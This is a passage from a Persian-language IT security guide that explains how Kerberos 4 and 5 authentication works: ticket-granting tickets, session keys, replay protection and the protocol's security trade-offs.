‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩ )ﺑﻄﻮﺭ ﺳﻨﺘﻲ ﺩﺭ ﻓﺎﻳﻞ ‪ ،(krb5.conf‬ﻳﺎ ﻣﻲﺗـﻮﺍﻥ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ‪ Kerberos‬ﺭﺍ ﺑـﺎ‬
‫ﺍﻗﻼﻡ ﺩﺍﺩﺓ ‪ DNS SRV‬ﺍﻋـﻼﻡ ﻋﻤـﻮﻣﻲ ﻧﻤـﻮﺩ‪ ،‬ﮐـﻪ ﺩﺭ ﺳـﻨﺪ ‪IETF Internet-Draft draft-ietf-krv-wg-krb-dns-locate‬‬
‫ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ‪ Kerberos 4‬ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻛﺮﺩﻳـﺪ‪ ،‬ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ﭘﻴـﺎﻣﻲ ﺭﺍ ﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫‪ Kerberos‬ﻣﻲﻓﺮﺳﺘﺪ‪ ١٧٥.‬ﺍﻳﻦ ﭘﻴﺎﻡ ﺣﺎﻭﻱ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺷﻤﺎﺳﺖ ﻭ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺷـﻤﺎ ﺳـﻌﻲ ﺩﺍﺭﻳـﺪ ﻭﺍﺭﺩ ﺳﻴـﺴﺘﻢ ﺷـﻮﻳﺪ‪.‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺧﻮﺩ ﭘﺮﻭﻧﺪﺓ ﺷﻤﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻭ ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﺷـﻨﺎﺧﺘﻪ ﺷـﻮﻳﺪ‪،‬‬
‫ﻳﻚ ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺑﺮﺍﻳﺘﺎﻥ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺎ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺳـﭙﺲ ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ﺍﺯ ﺷـﻤﺎ‬
‫ﻣﻲﺧﻮﺍﻫﺪ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻛﻨﻴﺪ ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﺗﻼﺵ ﻣﻲﻛﻨﺪ ﺑﻠﻴﻂ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺭﺍ ﺑـﺎ ﺭﻣـﺰ ﻋﺒـﻮﺭﻱ ﻛـﻪ ﺷـﻤﺎ ﺍﺭﺍﺋـﻪ ﻛـﺮﺩﻩﺍﻳـﺪ‬
‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺑﺎﺷﺪ‪ ،‬ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﺫﺧﻴﺮﻩ ﻧﻤﻲﻛﻨﺪ‪ ،‬ﻭ ﻣﻨﺤﺼﺮﹰﺍ ﺍﺯ ﺑﻠـﻴﻂ ﺗـﺼﺪﻳﻖ ﺑﻠـﻴﻂ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺑﻪ ﺷﻜﺴﺖ ﺑﻴﺎﻧﺠﺎﻣﺪ‪ ،‬ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺧﻮﺍﻫﺪ ﺩﺍﻧﺴﺖ ﻛﻪ ﺷﻤﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﺎﺩﺭﺳﺘﻲ ﺍﺭﺍﺋﻪ ﻛﺮﺩﻩﺍﻳﺪ ﻭ ﺍﺯ ﺷـﻤﺎ‬
‫ﻣﻲﺧﻮﺍﻫﺪ ﻣﺠﺪﺩﹰﺍ ﺑﺮﺍﻱ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺻﺤﻴﺢ ﺗﻼﺵ ﻛﻨﻴﺪ‪.‬‬
‫ﺩﺭ ‪ ،Kerberos 5‬ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻗﺒﻞ ﺍﺯ ﺗﻤﺎﺱ ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻨﺘﻈﺮ ﻣﻲﻣﺎﻧﺪ ﺗﺎ ﺷﻤﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻛﻨﻴﺪ‪ .‬ﺁﻧﮕﺎﻩ ﻳـﻚ ﭘﻴـﺎﻡ‬
‫ﺣﺎﻭﻱ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻭ ﺗﺎﺭﻳﺦ ﻫﻤﺎﻧﺮﻭﺯ ‪ -‬ﻛﻪ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷـﺪﻩ ‪ -‬ﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ‪Kerberos‬‬
‫ﻣﻲﻓﺮﺳﺘﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺪﻧﺒﺎﻝ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺷﻤﺎ ﻣﻲﮔﺮﺩﺩ‪ ،‬ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﻣﻲﻳﺎﺑﺪ‪ ،‬ﻭ ﺗﻼﺵ ﻣﻲﻛﻨـﺪ ﺗـﺎﺭﻳﺦ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺭﺍ‬
‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺘﻮﺍﻧﺪ ﺗﺎﺭﻳﺦ ﺍﺭﺳﺎﻟﻲ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ )ﻛﻪ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺁﻥ ﺗﺎﺭﻳﺦ‪ ،‬ﺗﺎﺭﻳﺦ ﻫﻤﺎﻧﺮﻭﺯ ﺧﻮﺍﻫﺪ ﺑـﻮﺩ( ﺁﻧﮕـﺎﻩ‬
‫‪١٧٦‬‬
‫ﻳﻚ ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ‪ ،‬ﺁﻧﺮﺍ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭﺗﺎﻥ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﻲﻓﺮﺳﺘﺪ‪.‬‬
‫ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﻳﻚ ﺑﻠﻮﻙ ﺩﺍﺩﻩ ﺍﺳﺖ ﺣﺎﻭﻱ ﻳﻚ ﻛﻠﻴﺪ ﻧﺸﺴﺖ ﻭ ﻳﻚ ﺑﻠﻴﻂ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲ ﺑﻠﻴﻂ ﺗـﺼﺪﻳﻖ ﺑﻠـﻴﻂ ‪ - Kerberos‬ﻛـﻪ‬
‫ﻫﻢ ﺑﺎ ﻛﻠﻴﺪ ﻧﺸﺴﺖ ﻭ ﻫﻢ ﺑﺎ ﻛﻠﻴﺪ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ‬
‫ﺑﻠﻴﻂ ‪ Kerberos‬ﺗﻤﺎﺱ ﺑﮕﻴﺮﺩ ﺗﺎ ﺑﺮﺍﻱ ﻫﺮ ﻣﻮﻛﻞ ﺩﺭﻭﻥ ﻗﻠﻤﺮﻭﻱ ‪ - Kerberos‬ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎ ﻭ ﻛـﺎﺭﺑﺮﺍﻧﻲ ﻛـﻪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺁﻧﻬﺎ ﺭﺍ ﻣﻲﺷﻨﺎﺳﺪ ‪ -‬ﺑﻠﻴﻂ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪.‬‬
‫‪ ۱۷۵‬ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻣﻘﺎﻻﺕ ﻭ ﺍﺳﻨﺎﺩ ‪ ،kerberos‬ﺍﺯ ﻧﻈﺮ ﻣﻨﻄﻘﻲ ﺩﻭ ﻧﻮﻉ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ kerberos‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ :‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﻭ ﺳﺮﻭﻳﺲ ﺗـﺼﺪﻳﻖ ﺑﻠـﻴﻂ‪.‬‬
‫ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﻳﻦ ﺗﻠﻘﻲ ﺩﻗﻴﻖ ﻧﻴﺴﺖ‪ ،‬ﭼﻮﻥ ﻫﻤﻪ ﺳﻴﺴﺘﻢ ‪ kerberos‬ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜـﻲ ﺗﻨﻬـﺎ ﻳـﻚ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ‪ -‬ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ‬
‫‪ ،kerberos‬ﻳﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻛﻠﻴﺪ ‪ -‬ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫‪ ۱۷۶‬ﭼﺮﺍ ﭘﺮﻭﺗﻜﻞ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺖ؟ ‪ Kerberos 4‬ﺗﻼﺵ ﻣﻲﻛﺮﺩ ﺗﻌﺪﺍﺩ ﺩﻓﻌﺎﺗﻲ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺩﺭ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺫﺧﻴﺮﻩ ﻣﻲﺷﺪ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺑﺮﺳﺎﻧﺪ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ‪ ،‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ‬
‫ﺑﺎﻋﺚ ﺷﺪ ﺑﺮﺍﺣﺘﻲ ﺑﺘﻮﺍﻥ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ‪ Kerberso 4‬ﺭﺍ ﺑﺼﻮﺭﺕ ‪ offline‬ﺣﺪﺱ ﺯﺩ‪ .‬ﺩﺭ ‪ Kerberos 5‬ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺑﺎﻳﺪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ kerberos‬ﻧﺸﺎﻥ ﺩﻫﺪ ﻛﻪ ﻛﺎﺭﺑﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺻﺤﻴﺢ ﺭﺍ ﻣﻲﺩﺍﻧﺪ‪ .‬ﺍﻳﻦ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻣﻦﺗﺮ ﺍﺳﺖ‪ ،‬ﻫﺮﭼﻨﺪ ﭼﻮﻥ ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻛﺎﺭﺑﺮ ﺍﺯ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻪ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ ،‬ﻟﺬﺍ ﻫﻤﭽﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻮﺳﻴﻠﻪ ﻳﻚ ﻣﻬﺎﺟﻢ ﺩﺯﺩﻳﺪﻩ ﺷﻮﺩ ﻭ ﺑﺎ ﻳﻚ ﺟﺴﺘﺠﻮﻱ ﻛﻠﻴﺪ ﻛﺎﻣﻞ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻭﺍﻗﻊ ﮔﺮﺩﺩ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻭﻗﺘﻲ ﻛﺎﺭﺑﺮ ﺑﺮﺍﻱ ﺑﺎﺭ ﺍﻭﻝ ﺗﻼﺵ ﻣﻲﻛﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ‪ Kerberos‬ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﺩﺳﺘﺮﺳﻲ ﭘﻴـﺪﺍ ﻛﻨـﺪ‪،‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﻴﺴﺘﻢ ﺭﻭﻱ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺑﺎ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺗﻤﺎﺱ ﻣﻲﮔﻴـﺮﺩ ﻭ ﺗﻘﺎﺿـﺎﻱ ﻳـﻚ ﺑﻠـﻴﻂ ﺑـﺮﺍﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻓﺎﻳـﻞ‬
‫ﻣﻲﻓﺮﺳﺘﺪ‪ .‬ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺑﻪ ﻛﺎﺭﺑﺮ ﻳﻚ ﺑﻠﻴﻂ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻓﺎﻳﻞ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺍﻧﺪ‪ .‬ﺑﻠﻴﻂ ﻓﺮﺳﺘﺎﺩﻩ ﺷـﺪﻩ ﺣـﺎﻭﻱ ﻳـﻚ ﺑﻠـﻴﻂ‬
‫ﺩﻳﮕﺮ ﺍﺳﺖ‪ ،‬ﻛﻪ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻓﺎﻳﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﻭ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺩﺭﺧﻮﺍﺳﺖ ﻓﺎﻳﻠﻬﺎ ﺁﻧـﺮﺍ ﺑـﻪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻓﺎﻳﻞ ﺍﺭﺍﺋﻪ ﻛﻨﺪ‪ .‬ﺑﻠﻴﻂ ﻳﺎﺩﺷﺪﻩ ﺣﺎﻭﻱ ﻧﺎﻡ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﺓ ﻛﺎﺭﺑﺮ‪ ،‬ﺯﻣﺎﻥ ﺍﻧﻘﻀﺎ ﻭ ﺁﺩﺭﺱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﻳﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ﻛـﺎﺭﺑﺮ‬
‫ﺍﺳﺖ‪ .‬ﺳﭙﺲ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺎﺭﺑﺮ ﺍﻳﻦ ﺑﻠﻴﻂ ﺭﺍ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻓﺎﻳﻞ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻓﺎﻳﻞ ﺑﻠﻴﻂ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ‬
‫ﺧﻮﺩ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﻳﻚ ﻧﮕﺎﺷﺖ ﻣﻴﺎﻥ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺎﺭﺑﺮ )‪ ،UID‬ﺁﺩﺭﺱ ‪ (IP‬ﻭ ﻳﻚ ‪ UID‬ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﻓﺎﻳـﻞ‬
‫ﻣﻲﺳﺎﺯﺩ‪ Kerberos .‬ﺯﻣﺎﻥ ﺭﻭﺯ ﺭﺍ ﺩﺭ ﺗﻘﺎﺿﺎﻫﺎ ﻣﻲﮔﺬﺍﺭﺩ ﺗﺎ ﺍﺯ ﺩﺯﺩﻳﺪﻩ ﺷﺪﻥ ﻳﻚ ﺗﻘﺎﺿﺎ ﻭ ﺍﻧﺘﻘﺎﻝ ﺁﻥ ﺍﺯ ﻣﻴﺰﺑﺎﻥ ﻣﺸﺎﺑﻪ ﺩﺭ ﺯﻣﺎﻧﻬـﺎﻱ ﺑﻌـﺪ‬
‫)ﻣﺜ ﹰﻼ ﺩﺭ ﻳﻚ ﺣﻤﻠﻪ ﺗﻜﺮﺍﺭ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬﺎﺟﻢ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻛﻨﻨﺪﻩ( ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ‪.‬‬
‫‪٣٤٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪ Kerberos‬ﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴﺘﻲ ﭼﻨﺪ ﻣﺰﻳﺖ ﺩﺍﺭﺩ‪ .‬ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺠﺎﻱ ﺫﺧﻴـﺮﻩ ﺷـﺪﻥ ﺩﺭ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ ﻛـﺎﺭﻱ ﻣﻨﻔـﺮﺩ ﺩﺭ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫‪ Kerberos‬ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﻫﺮﮔﺰ ﺍﺯ ﺭﻭﻱ ﺷﺒﻜﻪ ﺍﻧﺘﻘﺎﻝ ﻧﻤﻲﻳﺎﺑﻨﺪ ‪ -‬ﺑﺼﻮﺭﺕ ﺭﻣﺰﺷﺪﻩ ﻳﺎ ﻫﺮ ﻃـﻮﺭ ﺩﻳﮕـﺮ‪ .‬ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ‪ Kerberos‬ﻣﻲﺗﻮﺍﻧﺪ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﺼﺪﻳﻖ ﻛﻨﺪ‪ ،‬ﭼﻮﻥ ﻛﺎﺭﺑﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻣﻲﺩﺍﻧﺪ‪ ،‬ﻭ ﻫﻤﻴﻨﻄﻮﺭ ﻛﺎﺭﺑﺮ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﻫﻮﻳـﺖ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺭﺍ ﺗﺼﺪﻳﻖ ﻛﻨﺪ‪ ،‬ﭼﻮﻥ ﺁﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻫﻢ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺭﺍ ﻣﻲﺩﺍﻧﺪ‪ .‬ﭼﻮﻥ ﻛﺎﺭﺑﺮ ﻳﻚ ﺑﻠﻴﻂ ﺻﺎﺩﺭ ﺷـﺪﻩ‬
‫ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺎ ﻛﻠﻴﺪ ﺳﺮﻭﻳﺲ ﻣﻘﺼﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ ﺧﺪﻣﺎﺕ ﺩﻳﮕﺮ ‪ Kerberos‬ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﻨﺪ‪.‬‬
‫ﻛﺴﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻳﻚ ﺑﻠﻴﻂ ﺭﺍ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﻣـﻲﺩﺯﺩﺩ ﻧﻤـﻲﺗﻮﺍﻧـﺪ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ ﭼـﻮﻥ ﺑـﺎ ﻛﻠﻴـﺪﻱ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ )ﻛﻠﻴﺪ ﻳﻚ ﺳﺮﻭﻳﺲ ‪ Kerberos‬ﻭ ﻳﺎ ﺑﺪﺳﺖ ﺁﻣﺪﻩ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ( ﻛﻪ ﻣﻬﺎﺟﻢ ﺁﻧﺮﺍ ﻧﻤﻲﺷﻨﺎﺳﺪ‪.‬‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﻳﮑﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺩﺍﺩﻩ‪ ،‬ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ‬
‫ﻲ ﻣـﻮﻛﻼﻥ ﺭﻭﻱ ﺷـﺒﻜﻪ ﺍﺳـﺖ‪ .‬ﺩﺭ ﺣﺎﻟـﺖ ﻋـﺎﺩﻱ ﺍﺯ‬
‫‪ Kerberos‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺑﻪ ﺍﺷـﺘﺮﺍﻙﮔـﺬﺍﺭﻱ ﻛﻠﻴـﺪﻫﺎﻱ ﺧـﺼﻮﺻ ﹺ‬
‫‪ Kerberos‬ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺗﻮﺍﻧﺎﻳﻲ ﺗﺒﺎﺩﻝ ﻛﻠﻴﺪﻫﺎ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﺮﺍﻱ ﺗـﻀﻤﻴﻦ ﻳﮑﭙـﺎﺭﭼﮕﻲ ﻭ‬
‫ﺻﺤﺖ ﺩﺍﺩﻩ ﻭ ﺳﺮﻱ ﺑﺎﻗﻲ ﻣﺎﻧﺪﻥ ﺁﻥ ﺑﻜﺎﺭ ﺭﻭﺩ‪.‬‬
‫ﺍﮔﺮ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻳﻚ ﺗﻬﺪﻳﺪ ﺟﺪﻱ ﺑﺎﺷﺪ‪ ،‬ﻣﻲﺗﻮﺍﻥ ﻛﻠﻴﺔ ﺍﻃﻼﻋﺎﺕ ﺍﻧﺘﻘﺎﻟﻲ ﻣﻴﺎﻥ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻭ ﺳﺮﻭﻳﺲ ﺭﺍ ﺑﺎ ﻳﻚ ﻛﻠﻴـﺪ ﻛـﻪ ﻣﻴـﺎﻥ ﺩﻭ‬
‫ﻣﻮﻛﻞ ﻣﺒﺎﺩﻟﻪ ﺷﺪﻩ ﺍﺳﺖ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﺮﺩ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺎﻋﺚ ﻛـﺎﻫﺶ ﻛـﺎﺭﺍﻳﻲ ﻣـﻲﺷـﻮﺩ‪ .‬ﺩﺭ ‪ MIT‬ﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺴﻴﺎﺭ ﺣﺴﺎﺱ ﻣﺜﻞ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺑﻴﺸﺘﺮ ﺩﺍﺩﻩﻫﺎ ﻣﺜﻞ ﻓﺎﻳﻠﻬﺎ ﻭ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻪ‪.‬‬
‫ﺑﻠﻴﻂﻫﺎﻱ ﺻﺎﺩﺭﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ‪ Kerberos‬ﺑﻌﺪ ﺍﺯ ‪ ۸‬ﺳﺎﻋﺖ ﻣﻨﻘﻀﻲ ﻣﻲﺷﻮﻧﺪ ‪ -‬ﺍﻳﻦ ﺗﻜﻨﻴﻚ ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺣﻤـﻼﺕ ﺗﻜـﺮﺍﺭ ﺩﺭﻧﻈـﺮ‬
